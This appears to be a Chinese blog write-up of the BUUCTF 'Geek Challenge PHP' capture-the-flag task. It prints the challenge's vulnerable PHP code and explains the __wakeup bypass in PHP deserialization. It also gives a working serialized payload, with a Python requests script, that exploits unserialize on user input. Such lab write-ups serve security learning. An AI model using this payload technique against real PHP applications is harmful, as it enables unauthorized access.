BUUCTF--极客大挑战php

最新推荐文章于 2024-05-13 09:10:34 发布
最新推荐文章于 2024-05-13 09:10:34 发布
阅读量1.1k 收藏 22
点赞数 16
分类专栏: CTF_web 文章标签: php 反序列化 __wakeup绕过 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woshicainiao666/article/details/136503103
版权
文章讲述了如何通过下载网站备份文件,利用PHP代码中的__wakeup和__destruct方法,绕过私有变量限制,通过序列化和URL编码技巧获取flag。涉及到了魔术方法的使用和安全漏洞的利用方法。
摘要由CSDN通过智能技术生成

文章目录

1.网站备份文件www.zip

在这里插入图片描述

2.下载后发现

在这里插入图片描述

class.php

<?php
include 'flag.php';
error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

index.php

    <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

3.分析php代码

由index.php中,得到网站GET传参select,将传进的数据,进行反序列化;重点是class.php,通过代码分析,构造析构函数中username必须是admin,password必须是100,才能包含flag.php

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }

__destruct() 是一个特殊的 PHP 魔术方法(Magic Method),用于在对象实例被销毁时执行一些操作。当没有任何引用指向一个对象或者显式地调用 unset() 函数时,对象就会被销毁,此时 __destruct() 方法会被调用。

    function __wakeup(){
        $this->username = 'guest';
    }

在PHP中,__wakeup() 是一个特殊的魔术方法(magic method),它在反序列化一个对象时被调用。当使用 unserialize() 函数从字符串中重新创建对象时,如果该类中定义了 __wakeup() 方法,那么在反序列化后将立即调用该方法
也就是说,当我们即使传参admin,100的值后,当实类被反序列化调用时,__wakeup函数会被自动调用,username也会将admin调换成guest
所以就要绕过__wakeup方法就可以了,

绕过__wakeup方法

当序列化的中的成员数大于实际成员数,就会跳过__wakeup方法的执行

<?php

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function __wakeup(){
        $this->username = 'guest';
    }
}

$a = new Name('admin', 100);
echo serialize($a)
?>

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

将类Name后的2,改为3,即可绕过

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

变量权限为私有或保护

参考链接:https://blog.csdn.net/weixin_45844670/article/details/108171963

private是私有字段,只有在所声明的类中可见,子类和该类的实类都不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀

python方法

import requests
url = "http://fdc1a5b4-4e8c-4077-8471-748df3708de0.node5.buuoj.cn:81/"
ruqset = requests.get(url+'?select=O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}')
print(ruqset.text)

在这里插入图片描述

url方法

将\0改为%00

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

在这里插入图片描述

郑 居中
关注
  • 16
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】CTF挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 4445
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
thegeekdeveloper-portfolio:开发人员组合
05-13
开发人员组合 构建设置 # install dependencies $ npm install # serve with hot reload at localhost:3000 $ npm run dev # build for production and launch server $ npm run build $ npm start # generate ...
[挑战 2020]Roamphp2-Myblog
m0_64348326的博客
09-04 207
3.进入后台上面读取到的文件上传代码就重要了,它采取了白名单的方式只允许图片后缀上传,但是要访问压缩包里面的木马文件,还需要使用。木马文件,不用加后缀,因为它会自动加。文件,并从中读取序列化数据的。1.进入到界面,url主界面一个很明显的文件包含,直接用。,因为可以猜测到它的文件包含页面逻辑会给所有文件名都加上。,明显密码和登录界面说的一样,获取不了。协议的用法,因为想到了,无论文件是什么后缀,名给删除,php就找不到密码数据了,也就是。6.上传成功,访问即可执行命令,,上传的时候再访问压缩包内的。
BUUCTF-[挑战 2019]PHP1
Monica的博客
09-27 3657
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
[网络安全 CTF] BUUCTF挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[挑战 2019]php
最新发布
2401_84971538的博客
05-13 343
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 2965
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
[挑战 2019]PHP1
陈艺秋的博客
05-27 2390
既然提到了备份网站估计也是存在着网站备份文件,可以先用御剑扫一下啥都没扫出来,但是上回做文件备份的题目时收集了一些关于常用备份文件的文件名和后缀,可以直接使用burp抓包爆破,果然爆破出一个www.zip文件访问下载好文件就有三个php文件,下面进行代码审计。
BUUCTF——phpweb
weixin_45864041的博客
04-17 610
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
Certificate-Engine:之家的证书引擎
05-15
证书引擎这是技术协会House of Geeks的证书引擎的开发库。... 将其克隆到您的计算机。 在“ cehg / client / web-app”文件夹中打开终端/ cmd 运行“ npm install”以安装所有依赖项。 运行“ npm start”以启动开发...
mercado-c:大学正在进行的项目
04-09
大学正在进行的项目 向用户显示菜单的应用程序; 将产品添加到购物车时,只需更改数量即可检查购物车中是否已存在同一产品。 在购买结束时,必须根据购物车中输入的产品和数量将总额显示给用户。
勇士的奇妙大冒险之几何炼金 - 洋葱数学挑战赛最佳创意奖.zip
04-23
勇士的奇妙大冒险之几何炼金 - 洋葱数学挑战赛最佳创意奖
GeekWeek-Local:
03-15
周:本地活动是为期一周的黑马拉松,目的是创建骇,解决问题并建立大小型的个人档案。 您可以在每天和一周的挑战中进行选择,这些挑战的难度各不相同,因此无论是您的初次编码还是经验丰富的专家,Geek ...
buuctf php(扫描网站备份文件和反序列化漏洞)
qq_44111753的博客
12-30 1084
知识点: 1、扫描网站备份文件 别人写的备份文件url生成字典脚本 import os import os.path import requests from urllib.parse import unquote suffixList = ['.rar','.zip','.tar','.tar.gz'] keyList = ['www','wwwroot','site','web','website','backup','data','mdb','WWW','新建文件夹','ceshi','databa
【BUUCTF】[挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 1929
【BUUCTF】[挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
[挑战 2019]PHP-反序列化
siu~
11-14 160
[挑战 2019]PHP-反序列化
buuctf php
ANYOUZHEN的博客
05-24 279
根据提示,网站一个有备份,我们打开御剑,直接扫它,发现了/www.zip,打开 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->userna..
BUUCTF-[挑战 2019]PHP
rumil的博客
06-29 194
通过第二个if控制语句,我们发现通过正则表达式过滤掉了flag,所有说file参数传入时,如果有flag出现就会被过滤掉,我们再根据下一句话,文件包含,我们尝试去获取useless.php 的源码,看是什么信息,再次构造payload。发现是网页的源码,经过分析可得,三个参数分别为text,file,password通过get方式进行传参,在if控制语句当中,设置text变量,并在文件当中读取数据,要等于welcome to the zjctf才会返回true。:私有的类成员则只能被其定义所在的类访问。
[挑战 2019]PHP 1——php反序列化
weixin_51325053的博客
09-12 482
保存,然后获得序列化后的字符串:O:4:“Name”:2:{s:14:“Nameusername”;发现一段php文件,包含class.php文件,用get的方式传入一个select参数,并将结果反序列化(unserialize)我们将用这串序列化的字符串替换select,但问题是,当执行反序列(unserialize)时,会首先执行。在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup(),去执行__destruct。于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,
buuctf 刷题2(md5(true)参数漏洞&php字符串解析特性&php&dirsearch&php反序列化)
weixin_63231007的博客
05-02 2182
[BJDCTF2020]Easy MD5 1 burp抓包,发现传入的参数的语句为: Hint: select * from 'admin' where password=md5($pass,true) md5函数介绍为: md5( string , raw ) string : 规定需要计算的字符串 raw : 规定十六进制或二进制输出格式。 true:16字符二进制格式 false(默认): 32字符十六进制数 md5 true参数漏洞有 ff...
buuctf 挑战2019php
08-24
buuctf 挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值